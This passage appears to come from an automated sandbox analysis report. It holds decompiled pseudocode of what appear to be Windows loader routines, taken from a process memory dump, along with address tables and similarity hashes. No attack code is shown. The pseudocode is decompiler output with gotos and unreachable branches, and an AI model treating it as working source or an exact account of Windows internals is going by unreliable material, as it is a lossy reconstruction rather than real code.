                                                    									if((_t221 & 0x00000040) != 0) {
                                                    										_t228 = 0;
                                                    										__eflags = _t252;
                                                    										if(_t252 != 0) {
                                                    											goto L43;
                                                    										}
                                                    										_t133 = _v72;
                                                    										goto L7;
                                                    									}
                                                    									goto L43;
                                                    								} else {
                                                    									_t133 = _v72;
                                                    									goto L6;
                                                    								}
                                                    							}
                                                    							L25:
                                                    							_t133 = _v73;
                                                    							goto L26;
                                                    						} else {
                                                    							L6:
                                                    							_t221 =  *0x4c35cac; // 0x16
                                                    							L7:
                                                    							if(_t133 != 0) {
                                                    								__eflags = _t133 & 0x00001000;
                                                    								if((_t133 & 0x00001000) != 0) {
                                                    									_t133 = _t133 | 0x00000a00;
                                                    									__eflags = _t221 & 0x00000004;
                                                    									if((_t221 & 0x00000004) != 0) {
                                                    										_t133 = _t133 | 0x00000400;
                                                    									}
                                                    								}
                                                    								__eflags = _t228;
                                                    								if(_t228 != 0) {
                                                    									_t133 = _t133 | 0x00000100;
                                                    								}
                                                    								_t229 = E04B84A2C(0x4c36e40, 0x4b84b30, _t133, _t240);
                                                    								__eflags = _t229;
                                                    								if(_t229 == 0) {
                                                    									_t202 = _a20;
                                                    									goto L100;
                                                    								} else {
                                                    									_t135 =  *((intOrPtr*)(_t229 + 0x38));
                                                    									L15:
                                                    									_t202 = _a20;
                                                    									 *_t202 = _t135;
                                                    									if(_t229 == 0) {
                                                    										L100:
                                                    										 *_a4 = 0;
                                                    										_t137 = _a8;
                                                    										__eflags = _t137;
                                                    										if(_t137 != 0) {
                                                    											 *_t137 = 0;
                                                    										}
                                                    										 *_t202 = 0;
                                                    										_t129 = 0xc0000017;
                                                    										goto L23;
                                                    									} else {
                                                    										_t242 = _a16;
                                                    										if(_t242 != 0) {
                                                    											_t254 = _t229;
                                                    											memcpy(_t242, _t254, 0xd << 2);
                                                    											_t267 = _t267 + 0xc;
                                                    											_t242 = _t254 + 0x1a;
                                                    										}
                                                    										_t205 = _a4;
                                                    										_t25 = _t229 + 0x48; // 0x48
                                                    										 *_t205 = _t25;
                                                    										_t140 = _a8;
                                                    										if(_t140 != 0) {
                                                    											__eflags =  *((char*)(_t267 + 0xa));
                                                    											if( *((char*)(_t267 + 0xa)) != 0) {
                                                    												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
                                                    											} else {
                                                    												 *_t140 = 0;
                                                    											}
                                                    										}
                                                    										_t256 = _a12;
                                                    										if(_t256 != 0) {
                                                    											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
                                                    										}
                                                    										_t257 =  *_t205;
                                                    										_v48 = 0;
                                                    										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
                                                    										_v56 = 0;
                                                    										_v52 = 0;
                                                    										_t144 =  *( *[fs:0x30] + 0x50);
                                                    										if(_t144 != 0) {
                                                    											__eflags =  *_t144;
                                                    											if( *_t144 == 0) {
                                                    												goto L20;
                                                    											}
                                                    											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
                                                    											goto L21;
                                                    										} else {
                                                    											L20:
                                                    											_t145 = 0x7ffe0384;
                                                    											L21:
                                                    											if( *_t145 != 0) {
                                                    												_t146 =  *[fs:0x30];
                                                    												__eflags =  *(_t146 + 0x240) & 0x00000004;
                                                    												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
                                                    													_t147 = E04B67D50();
                                                    													__eflags = _t147;
                                                    													if(_t147 == 0) {
                                                    														_t148 = 0x7ffe0385;
                                                    													} else {
                                                    														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
                                                    													}
                                                    													__eflags =  *_t148 & 0x00000020;
                                                    													if(( *_t148 & 0x00000020) != 0) {
                                                    														_t149 = _v72;
                                                    														__eflags = _t149;
                                                    														if(__eflags == 0) {
                                                    															_t149 = 0x4b25c80;
                                                    														}
                                                    														_push(_t149);
                                                    														_push( &_v48);
                                                    														 *((char*)(_t267 + 0xb)) = E04B7F6E0(_t198, _t242, _t257, __eflags);
                                                    														_push(_t257);
                                                    														_push( &_v64);
                                                    														_t153 = E04B7F6E0(_t198, _t242, _t257, __eflags);
                                                    														__eflags =  *((char*)(_t267 + 0xb));
                                                    														if( *((char*)(_t267 + 0xb)) != 0) {
                                                    															__eflags = _t153;
                                                    															if(_t153 != 0) {
                                                    																__eflags = 0;
                                                    																E04BC7016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
                                                    																L04B62400(_t267 + 0x20);
                                                    															}
                                                    															L04B62400( &_v64);
                                                    														}
                                                    													}
                                                    												}
                                                    											}
                                                    											_t129 = 0;
                                                    											L23:
                                                    											return _t129;
                                                    										}
                                                    									}
                                                    								}
                                                    							}
                                                    							L8:
                                                    							_t275 = _t240;
                                                    							if(_t275 != 0) {
                                                    								_v73 = 0;
                                                    								_t253 = 0;
                                                    								__eflags = 0;
                                                    								L29:
                                                    								_push(0);
                                                    								_t241 = E04B72397(_t240);
                                                    								__eflags = _t241;
                                                    								if(_t241 == 0) {
                                                    									_t229 = 0;
                                                    									L14:
                                                    									_t135 = 0;
                                                    									goto L15;
                                                    								}
                                                    								__eflags =  *((char*)(_t267 + 0xb));
                                                    								 *(_t241 + 0x34) = 1;
                                                    								if( *((char*)(_t267 + 0xb)) != 0) {
                                                    									E04B62280(_t134, 0x4c38608);
                                                    									__eflags =  *0x4c36e48 - _t253; // 0xc97390
                                                    									if(__eflags != 0) {
                                                    										L48:
                                                    										_t253 = 0;
                                                    										__eflags = 0;
                                                    										L49:
                                                    										E04B5FFB0(_t198, _t241, 0x4c38608);
                                                    										__eflags = _t253;
                                                    										if(_t253 != 0) {
                                                    											L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
                                                    										}
                                                    										goto L31;
                                                    									}
                                                    									 *0x4c36e48 = _t241;
                                                    									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
                                                    									__eflags = _t253;
                                                    									if(_t253 != 0) {
                                                    										_t57 = _t253 + 0x34;
                                                    										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
                                                    										__eflags =  *_t57;
                                                    										if( *_t57 == 0) {
                                                    											goto L49;
                                                    										}
                                                    									}
                                                    									goto L48;
                                                    								}
                                                    								L31:
                                                    								_t229 = _t241;
                                                    								goto L14;
                                                    							}
                                                    							_v73 = 1;
                                                    							_v64 = _t240;
                                                    							asm("lock bts dword [esi], 0x0");
                                                    							if(_t275 < 0) {
                                                    								_t231 =  *0x4c38608; // 0x0
                                                    								while(1) {
                                                    									_v60 = _t231;
                                                    									__eflags = _t231 & 0x00000001;
                                                    									if((_t231 & 0x00000001) != 0) {
                                                    										goto L76;
                                                    									}
                                                    									_t73 = _t231 + 1; // 0x1
                                                    									_t210 = _t73;
                                                    									asm("lock cmpxchg [edi], ecx");
                                                    									__eflags = _t231 - _t231;
                                                    									if(_t231 != _t231) {
                                                    										L92:
                                                    										_t133 = E04B76B90(_t210,  &_v64);
                                                    										_t262 =  *0x4c38608; // 0x0
                                                    										L93:
                                                    										_t231 = _t262;
                                                    										continue;
                                                    									}
                                                    									_t240 = _v56;
                                                    									goto L10;
                                                    									L76:
                                                    									_t169 = E04B7E180(_t133);
                                                    									__eflags = _t169;
                                                    									if(_t169 != 0) {
                                                    										_push(0xc000004b);
                                                    										_push(0xffffffff);
                                                    										E04B897C0();
                                                    										_t231 = _v68;
                                                    									}
                                                    									_v72 = 0;
                                                    									_v24 =  *( *[fs:0x18] + 0x24);
                                                    									_v16 = 3;
                                                    									_v28 = 0;
                                                    									__eflags = _t231 & 0x00000002;
                                                    									if((_t231 & 0x00000002) == 0) {
                                                    										_v32 =  &_v36;
                                                    										_t174 = _t231 >> 4;
                                                    										__eflags = 1 - _t174;
                                                    										_v20 = _t174;
                                                    										asm("sbb ecx, ecx");
                                                    										_t210 = 3 |  &_v36;
                                                    										__eflags = _t174;
                                                    										if(_t174 == 0) {
                                                    											_v20 = 0xfffffffe;
                                                    										}
                                                    									} else {
                                                    										_v32 = 0;
                                                    										_v20 = 0xffffffff;
                                                    										_v36 = _t231 & 0xfffffff0;
                                                    										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
                                                    										_v72 =  !(_t231 >> 2) & 0xffffff01;
                                                    									}
                                                    									asm("lock cmpxchg [edi], esi");
                                                    									_t262 = _t231;
                                                    									__eflags = _t262 - _t231;
                                                    									if(_t262 != _t231) {
                                                    										goto L92;
                                                    									} else {
                                                    										__eflags = _v72;
                                                    										if(_v72 != 0) {
                                                    											E04B8006A(0x4c38608, _t210);
                                                    										}
                                                    										__eflags =  *0x7ffe036a - 1;
                                                    										if(__eflags <= 0) {
                                                    											L89:
                                                    											_t133 =  &_v16;
                                                    											asm("lock btr dword [eax], 0x1");
                                                    											if(__eflags >= 0) {
                                                    												goto L93;
                                                    											} else {
                                                    												goto L90;
                                                    											}
                                                    											do {
                                                    												L90:
                                                    												_push(0);
                                                    												_push(0x4c38608);
                                                    												E04B8B180();
                                                    												_t133 = _v24;
                                                    												__eflags = _t133 & 0x00000004;
                                                    											} while ((_t133 & 0x00000004) == 0);
                                                    											goto L93;
                                                    										} else {
                                                    											_t218 =  *0x4c36904; // 0x400
                                                    											__eflags = _t218;
                                                    											if(__eflags == 0) {
                                                    												goto L89;
                                                    											} else {
                                                    												goto L87;
                                                    											}
                                                    											while(1) {
                                                    												L87:
                                                    												__eflags = _v16 & 0x00000002;
                                                    												if(__eflags == 0) {
                                                    													goto L89;
                                                    												}
                                                    												asm("pause");
                                                    												_t218 = _t218 - 1;
                                                    												__eflags = _t218;
                                                    												if(__eflags != 0) {
                                                    													continue;
                                                    												}
                                                    												goto L89;
                                                    											}
                                                    											goto L89;
                                                    										}
                                                    									}
                                                    								}
                                                    							}
                                                    							L10:
                                                    							_t229 =  *0x4c36e48; // 0xc97390
                                                    							_v72 = _t229;
                                                    							if(_t229 == 0 ||  *((char*)(_t229 + 0x40)) == 0 &&  *((intOrPtr*)(_t229 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
                                                    								E04B5FFB0(_t198, _t240, 0x4c38608);
                                                    								_t253 = _v76;
                                                    								goto L29;
                                                    							} else {
                                                    								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
                                                    								asm("lock cmpxchg [esi], ecx");
                                                    								_t215 = 1;
                                                    								if(1 != 1) {
                                                    									while(1) {
                                                    										_t246 = _t215 & 0x00000006;
                                                    										_t180 = _t215;
                                                    										__eflags = _t246 - 2;
                                                    										_v56 = _t246;
                                                    										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
                                                    										asm("lock cmpxchg [edi], esi");
                                                    										_t248 = _v56;
                                                    										__eflags = _t180 - _t215;
                                                    										if(_t180 == _t215) {
                                                    											break;
                                                    										}
                                                    										_t215 = _t180;
                                                    									}
                                                    									__eflags = _t248 - 2;
                                                    									if(_t248 == 2) {
                                                    										__eflags = 0;
                                                    										E04B800C2(0x4c38608, 0, _t235);
                                                    									}
                                                    									_t229 = _v72;
                                                    								}
                                                    								goto L14;
                                                    							}
                                                    						}
                                                    					}
                                                    				}
                                                    				_t227 = 0;
                                                    				_v75 = 0;
                                                    				if(_t128 != 0) {
                                                    					goto L4;
                                                    				}
                                                    				goto L2;
                                                    			}











































































                                                    0x04bb5949
                                                    0x04bb594e
                                                    0x04bb594e
                                                    0x04bb5953
                                                    0x04bb595b
                                                    0x04bb5976
                                                    0x04bb5976
                                                    0x04bb597a
                                                    0x04bb597f
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x04bb5981
                                                    0x04bb5981
                                                    0x04bb5981
                                                    0x04bb5983
                                                    0x04bb5988
                                                    0x04bb598d
                                                    0x04bb5991
                                                    0x04bb5991
                                                    0x00000000
                                                    0x04bb595d
                                                    0x04bb595d
                                                    0x04bb5963
                                                    0x04bb5965
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x04bb5967
                                                    0x04bb5967
                                                    0x04bb596b
                                                    0x04bb596d
                                                    0x00000000
                                                    0x00000000
                                                    0x04bb596f
                                                    0x04bb5971
                                                    0x04bb5971
                                                    0x04bb5974
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x04bb5974
                                                    0x00000000
                                                    0x04bb5967
                                                    0x04bb595b
                                                    0x04bb5942
                                                    0x04bb5863
                                                    0x04b72143
                                                    0x04b72143
                                                    0x04b72149
                                                    0x04b7214f
                                                    0x04b722f1
                                                    0x04b722f6
                                                    0x00000000
                                                    0x04b72173
                                                    0x04b72173
                                                    0x04b7217d
                                                    0x04b72181
                                                    0x04b72186
                                                    0x04bb59ae
                                                    0x04bb59b2
                                                    0x04bb59b5
                                                    0x04bb59b7
                                                    0x04bb59ba
                                                    0x04bb59cd
                                                    0x04bb59d1
                                                    0x04bb59d5
                                                    0x04bb59d9
                                                    0x04bb59db
                                                    0x00000000
                                                    0x00000000
                                                    0x04bb59dd
                                                    0x04bb59dd
                                                    0x04bb59e1
                                                    0x04bb59e4
                                                    0x04bb59e7
                                                    0x04bb59ee
                                                    0x04bb59ee
                                                    0x04bb59f3
                                                    0x04bb59f3
                                                    0x00000000
                                                    0x04b72186
                                                    0x04b7214f
                                                    0x04b72106
                                                    0x04b72266
                                                    0x04b720d8
                                                    0x04b720da
                                                    0x04b720e0
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • Opcode ID: b8caa2b2c1738f5727f580fed1c9cf42f43d20c786694dd194bfe265803ff08b
                                                    • Instruction ID: 9162848b30b0bb00ef72ea3059a7ef3137e023b08522dad1c6e53d047e40d009
                                                    • Opcode Fuzzy Hash: b8caa2b2c1738f5727f580fed1c9cf42f43d20c786694dd194bfe265803ff08b
                                                    • Instruction Fuzzy Hash: A9F1C671608341AFEB29DF28C8407AA77E1EF85358F0489DDE9E59B250E774F841CB92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 87%
                                                    			E04B5D5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
                                                    				signed int _v8;
                                                    				intOrPtr _v20;
                                                    				signed int _v36;
                                                    				intOrPtr* _v40;
                                                    				signed int _v44;
                                                    				signed int _v48;
                                                    				signed char _v52;
                                                    				signed int _v60;
                                                    				signed int _v64;
                                                    				signed int _v68;
                                                    				signed int _v72;
                                                    				signed int _v76;
                                                    				intOrPtr _v80;
                                                    				signed int _v84;
                                                    				intOrPtr _v100;
                                                    				intOrPtr _v104;
                                                    				signed int _v108;
                                                    				signed int _v112;
                                                    				signed int _v116;
                                                    				intOrPtr _v120;
                                                    				signed int _v132;
                                                    				char _v140;
                                                    				char _v144;
                                                    				char _v157;
                                                    				signed int _v164;
                                                    				signed int _v168;
                                                    				signed int _v169;
                                                    				intOrPtr _v176;
                                                    				signed int _v180;
                                                    				signed int _v184;
                                                    				intOrPtr _v188;
                                                    				signed int _v192;
                                                    				signed int _v200;
                                                    				signed int _v208;
                                                    				intOrPtr* _v212;
                                                    				char _v216;
                                                    				void* __ebx;
                                                    				void* __edi;
                                                    				void* __esi;
                                                    				void* __ebp;
                                                    				signed int _t204;
                                                    				signed int _t206;
                                                    				void* _t208;
                                                    				signed int _t211;
                                                    				signed int _t216;
                                                    				intOrPtr _t217;
                                                    				intOrPtr* _t218;
                                                    				signed int _t226;
                                                    				signed int _t239;
                                                    				signed int* _t247;
                                                    				signed int _t249;
                                                    				void* _t252;
                                                    				signed int _t256;
                                                    				signed int _t269;
                                                    				signed int _t271;
                                                    				signed int _t277;
                                                    				signed int _t279;
                                                    				intOrPtr _t283;
                                                    				signed int _t287;
                                                    				signed int _t288;
                                                    				void* _t289;
                                                    				signed char _t290;
                                                    				signed int _t292;
                                                    				signed int* _t293;
                                                    				unsigned int _t297;
                                                    				signed int _t306;
                                                    				signed int _t307;
                                                    				signed int _t308;
                                                    				signed int _t309;
                                                    				signed int _t310;
                                                    				intOrPtr _t311;
                                                    				intOrPtr _t312;
                                                    				signed int _t319;
                                                    				signed int _t320;
                                                    				signed int* _t324;
                                                    				signed int _t337;
                                                    				signed int _t338;
                                                    				signed int _t339;
                                                    				signed int* _t340;
                                                    				void* _t341;
                                                    				signed int _t344;
                                                    				signed int _t348;
                                                    				signed int _t349;
                                                    				signed int _t351;
                                                    				intOrPtr _t353;
                                                    				void* _t354;
                                                    				signed int _t356;
                                                    				signed int _t358;
                                                    				intOrPtr _t359;
                                                    				signed int _t361;
                                                    				signed int _t363;
                                                    				signed short* _t365;
                                                    				void* _t367;
                                                    				intOrPtr _t369;
                                                    				void* _t370;
                                                    				signed int _t371;
                                                    				signed int _t372;
                                                    				void* _t374;
                                                    				signed int _t376;
                                                    				void* _t384;
                                                    				signed int _t387;
                                                    
                                                    				_v8 =  *0x4c3d360 ^ _t376;
                                                    				_t2 =  &_a20;
                                                    				 *_t2 = _a20 & 0x00000001;
                                                    				_t287 = _a4;
                                                    				_v200 = _a12;
                                                    				_t365 = _a8;
                                                    				_v212 = _a16;
                                                    				_v180 = _a24;
                                                    				_v168 = 0;
                                                    				_v157 = 0;
                                                    				if( *_t2 != 0) {
                                                    					__eflags = E04B56600(0x4c352d8);
                                                    					if(__eflags == 0) {
                                                    						goto L1;
                                                    					} else {
                                                    						_v188 = 6;
                                                    					}
                                                    				} else {
                                                    					L1:
                                                    					_v188 = 9;
                                                    				}
                                                    				if(_t365 == 0) {
                                                    					_v164 = 0;
                                                    					goto L5;
                                                    				} else {
                                                    					_t363 =  *_t365 & 0x0000ffff;
                                                    					_t341 = _t363 + 1;
                                                    					if((_t365[1] & 0x0000ffff) < _t341) {
                                                    						L109:
                                                    						__eflags = _t341 - 0x80;
                                                    						if(_t341 <= 0x80) {
                                                    							_t281 =  &_v140;
                                                    							_v164 =  &_v140;
                                                    							goto L114;
                                                    						} else {
                                                    							_t283 =  *0x4c37b9c; // 0x0
                                                    							_t281 = L04B64620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
                                                    							_v164 = _t281;
                                                    							__eflags = _t281;
                                                    							if(_t281 != 0) {
                                                    								_v157 = 1;
                                                    								L114:
                                                    								E04B8F3E0(_t281, _t365[2], _t363);
                                                    								_t200 = _v164;
                                                    								 *((char*)(_v164 + _t363)) = 0;
                                                    								goto L5;
                                                    							} else {
                                                    								_t204 = 0xc000009a;
                                                    								goto L47;
                                                    							}
                                                    						}
                                                    					} else {
                                                    						_t200 = _t365[2];
                                                    						_v164 = _t200;
                                                    						if( *((char*)(_t200 + _t363)) != 0) {
                                                    							goto L109;
                                                    						} else {
                                                    							while(1) {
                                                    								L5:
                                                    								_t353 = 0;
                                                    								_t342 = 0x1000;
                                                    								_v176 = 0;
                                                    								if(_t287 == 0) {
                                                    									break;
                                                    								}
                                                    								_t384 = _t287 -  *0x4c37b90; // 0x77df0000
                                                    								if(_t384 == 0) {
                                                    									_t353 =  *0x4c37b8c; // 0xc93d80
                                                    									_v176 = _t353;
                                                    									_t320 = ( *(_t353 + 0x50))[8];
                                                    									_v184 = _t320;
                                                    								} else {
                                                    									E04B62280(_t200, 0x4c384d8);
                                                    									_t277 =  *0x4c385f4; // 0xc92b20
                                                    									_t351 =  *0x4c385f8 & 1;
                                                    									while(_t277 != 0) {
                                                    										_t337 =  *(_t277 - 0x50);
                                                    										if(_t337 > _t287) {
                                                    											_t338 = _t337 | 0xffffffff;
                                                    										} else {
                                                    											asm("sbb ecx, ecx");
                                                    											_t338 =  ~_t337;
                                                    										}
                                                    										_t387 = _t338;
                                                    										if(_t387 < 0) {
                                                    											_t339 =  *_t277;
                                                    											__eflags = _t351;
                                                    											if(_t351 != 0) {
                                                    												__eflags = _t339;
                                                    												if(_t339 == 0) {
                                                    													goto L16;
                                                    												} else {
                                                    													goto L118;
                                                    												}
                                                    												goto L151;
                                                    											} else {
                                                    												goto L16;
                                                    											}
                                                    											goto L17;
                                                    										} else {
                                                    											if(_t387 <= 0) {
                                                    												__eflags = _t277;
                                                    												if(_t277 != 0) {
                                                    													_t340 =  *(_t277 - 0x18);
                                                    													_t24 = _t277 - 0x68; // 0xc92ab8
                                                    													_t353 = _t24;
                                                    													_v176 = _t353;
                                                    													__eflags = _t340[3] - 0xffffffff;
                                                    													if(_t340[3] != 0xffffffff) {
                                                    														_t279 =  *_t340;
                                                    														__eflags =  *(_t279 - 0x20) & 0x00000020;
                                                    														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
                                                    															asm("lock inc dword [edi+0x9c]");
                                                    															_t340 =  *(_t353 + 0x50);
                                                    														}
                                                    													}
                                                    													_v184 = _t340[8];
                                                    												}
                                                    											} else {
                                                    												_t339 =  *(_t277 + 4);
                                                    												if(_t351 != 0) {
                                                    													__eflags = _t339;
                                                    													if(_t339 == 0) {
                                                    														goto L16;
                                                    													} else {
                                                    														L118:
                                                    														_t277 = _t277 ^ _t339;
                                                    														goto L17;
                                                    													}
                                                    													goto L151;
                                                    												} else {
                                                    													L16:
                                                    													_t277 = _t339;
                                                    												}
                                                    												goto L17;
                                                    											}
                                                    										}
                                                    										goto L25;
                                                    										L17:
                                                    									}
                                                    									L25:
                                                    									E04B5FFB0(_t287, _t353, 0x4c384d8);
                                                    									_t320 = _v184;
                                                    									_t342 = 0x1000;
                                                    								}
                                                    								if(_t353 == 0) {
                                                    									break;
                                                    								} else {
                                                    									_t366 = 0;
                                                    									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
                                                    										_t288 = _v164;
                                                    										if(_t353 != 0) {
                                                    											_t342 = _t288;
                                                    											_t374 = E04B9CC99(_t353, _t288, _v200, 1,  &_v168);
                                                    											if(_t374 >= 0) {
                                                    												if(_v184 == 7) {
                                                    													__eflags = _a20;
                                                    													if(__eflags == 0) {
                                                    														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
                                                    														if(__eflags != 0) {
                                                    															_t271 = E04B56600(0x4c352d8);
                                                    															__eflags = _t271;
                                                    															if(__eflags == 0) {
                                                    																_t342 = 0;
                                                    																_v169 = _t271;
                                                    																_t374 = E04B57926( *(_t353 + 0x50), 0,  &_v169);
                                                    															}
                                                    														}
                                                    													}
                                                    												}
                                                    												if(_t374 < 0) {
                                                    													_v168 = 0;
                                                    												} else {
                                                    													if( *0x4c3b239 != 0) {
                                                    														_t342 =  *(_t353 + 0x18);
                                                    														E04BCE974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
                                                    													}
                                                    													if( *0x4c38472 != 0) {
                                                    														_v192 = 0;
                                                    														_t342 =  *0x7ffe0330;
                                                    														_t361 =  *0x4c3b218; // 0x0
                                                    														asm("ror edi, cl");
                                                    														 *0x4c3b1e0( &_v192, _t353, _v168, 0, _v180);
                                                    														 *(_t361 ^  *0x7ffe0330)();
                                                    														_t269 = _v192;
                                                    														_t353 = _v176;
                                                    														__eflags = _t269;
                                                    														if(__eflags != 0) {
                                                    															_v168 = _t269;
                                                    														}
                                                    													}
                                                    												}
                                                    											}
                                                    											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
                                                    												_t366 = 0xc000007a;
                                                    											}
                                                    											_t247 =  *(_t353 + 0x50);
                                                    											if(_t247[3] == 0xffffffff) {
                                                    												L40:
                                                    												if(_t366 == 0xc000007a) {
                                                    													__eflags = _t288;
                                                    													if(_t288 == 0) {
                                                    														goto L136;
                                                    													} else {
                                                    														_t366 = 0xc0000139;
                                                    													}
                                                    													goto L54;
                                                    												}
                                                    											} else {
                                                    												_t249 =  *_t247;
                                                    												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
                                                    													goto L40;
                                                    												} else {
                                                    													_t250 = _t249 | 0xffffffff;
                                                    													asm("lock xadd [edi+0x9c], eax");
                                                    													if((_t249 | 0xffffffff) == 0) {
                                                    														E04B62280(_t250, 0x4c384d8);
                                                    														_t342 =  *(_t353 + 0x54);
                                                    														_t165 = _t353 + 0x54; // 0x54
                                                    														_t252 = _t165;
                                                    														__eflags =  *(_t342 + 4) - _t252;
                                                    														if( *(_t342 + 4) != _t252) {
                                                    															L135:
                                                    															asm("int 0x29");
                                                    															L136:
                                                    															_t288 = _v200;
                                                    															_t366 = 0xc0000138;
                                                    															L54:
                                                    															_t342 = _t288;
                                                    															L04B83898(0, _t288, _t366);
                                                    														} else {
                                                    															_t324 =  *(_t252 + 4);
                                                    															__eflags =  *_t324 - _t252;
                                                    															if( *_t324 != _t252) {
                                                    																goto L135;
                                                    															} else {
                                                    																 *_t324 = _t342;
                                                    																 *(_t342 + 4) = _t324;
                                                    																_t293 =  *(_t353 + 0x50);
                                                    																_v180 =  *_t293;
                                                    																E04B5FFB0(_t293, _t353, 0x4c384d8);
                                                    																__eflags =  *((short*)(_t353 + 0x3a));
                                                    																if( *((short*)(_t353 + 0x3a)) != 0) {
                                                    																	_t342 = 0;
                                                    																	__eflags = 0;
                                                    																	E04B837F5(_t353, 0);
                                                    																}
                                                    																E04B80413(_t353);
                                                    																_t256 =  *(_t353 + 0x48);
                                                    																__eflags = _t256;
                                                    																if(_t256 != 0) {
                                                    																	__eflags = _t256 - 0xffffffff;
                                                    																	if(_t256 != 0xffffffff) {
                                                    																		E04B79B10(_t256);
                                                    																	}
                                                    																}
                                                    																__eflags =  *(_t353 + 0x28);
                                                    																if( *(_t353 + 0x28) != 0) {
                                                    																	_t174 = _t353 + 0x24; // 0x24
                                                    																	E04B702D6(_t174);
                                                    																}
                                                    																L04B677F0( *0x4c37b98, 0, _t353);
                                                    																__eflags = _v180 - _t293;
                                                    																if(__eflags == 0) {
                                                    																	E04B7C277(_t293, _t366);
                                                    																}
                                                    																_t288 = _v164;
                                                    																goto L40;
                                                    															}
                                                    														}
                                                    													} else {
                                                    														goto L40;
                                                    													}
                                                    												}
                                                    											}
                                                    										}
                                                    									} else {
                                                    										L04B5EC7F(_t353);
                                                    										L04B719B8(_t287, 0, _t353, 0);
                                                    										_t200 = E04B4F4E3(__eflags);
                                                    										continue;
                                                    									}
                                                    								}
                                                    								L41:
                                                    								if(_v157 != 0) {
                                                    									L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
                                                    								}
                                                    								if(_t366 < 0) {
                                                    									L46:
                                                    									 *_v212 = _v168;
                                                    									_t204 = _t366;
                                                    									L47:
                                                    									_pop(_t354);
                                                    									_pop(_t367);
                                                    									_pop(_t289);
                                                    									return E04B8B640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
                                                    								} else {
                                                    									_t206 =  *0x4c3b2f8; // 0xdf0000
                                                    									if((_t206 |  *0x4c3b2fc) == 0 || ( *0x4c3b2e4 & 0x00000001) != 0) {
                                                    										goto L46;
                                                    									} else {
                                                    										_t297 =  *0x4c3b2ec; // 0x100
                                                    										_v200 = 0;
                                                    										if((_t297 >> 0x00000008 & 0x00000003) == 3) {
                                                    											_t355 = _v168;
                                                    											_t342 =  &_v208;
                                                    											_t208 = E04BF6B68(_v168,  &_v208, _v168, __eflags);
                                                    											__eflags = _t208 - 1;
                                                    											if(_t208 == 1) {
                                                    												goto L46;
                                                    											} else {
                                                    												__eflags = _v208 & 0x00000010;
                                                    												if((_v208 & 0x00000010) == 0) {
                                                    													goto L46;
                                                    												} else {
                                                    													_t342 = 4;
                                                    													_t366 = E04BF6AEB(_t355, 4,  &_v216);
                                                    													__eflags = _t366;
                                                    													if(_t366 >= 0) {
                                                    														goto L46;
                                                    													} else {
                                                    														asm("int 0x29");
                                                    														_t356 = 0;
                                                    														_v44 = 0;
                                                    														_t290 = _v52;
                                                    														__eflags = 0;
                                                    														if(0 == 0) {
                                                    															L108:
                                                    															_t356 = 0;
                                                    															_v44 = 0;
                                                    															goto L63;
                                                    														} else {
                                                    															__eflags = 0;
                                                    															if(0 < 0) {
                                                    																goto L108;
                                                    															}
                                                    															L63:
                                                    															_v112 = _t356;
                                                    															__eflags = _t356;
                                                    															if(_t356 == 0) {
                                                    																L143:
                                                    																_v8 = 0xfffffffe;
                                                    																_t211 = 0xc0000089;
                                                    															} else {
                                                    																_v36 = 0;
                                                    																_v60 = 0;
                                                    																_v48 = 0;
                                                    																_v68 = 0;
                                                    																_v44 = _t290 & 0xfffffffc;
                                                    																E04B5E9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
                                                    																_t306 = _v68;
                                                    																__eflags = _t306;
                                                    																if(_t306 == 0) {
                                                    																	_t216 = 0xc000007b;
                                                    																	_v36 = 0xc000007b;
                                                    																	_t307 = _v60;
                                                    																} else {
                                                    																	__eflags = _t290 & 0x00000001;
                                                    																	if(__eflags == 0) {
                                                    																		_t349 =  *(_t306 + 0x18) & 0x0000ffff;
                                                    																		__eflags = _t349 - 0x10b;
                                                    																		if(_t349 != 0x10b) {
                                                    																			__eflags = _t349 - 0x20b;
                                                    																			if(_t349 == 0x20b) {
                                                    																				goto L102;
                                                    																			} else {
                                                    																				_t307 = 0;
                                                    																				_v48 = 0;
                                                    																				_t216 = 0xc000007b;
                                                    																				_v36 = 0xc000007b;
                                                    																				goto L71;
                                                    																			}
                                                    																		} else {
                                                    																			L102:
                                                    																			_t307 =  *(_t306 + 0x50);
                                                    																			goto L69;
                                                    																		}
                                                    																		goto L151;
                                                    																	} else {
                                                    																		_t239 = L04B5EAEA(_t290, _t290, _t356, _t366, __eflags);
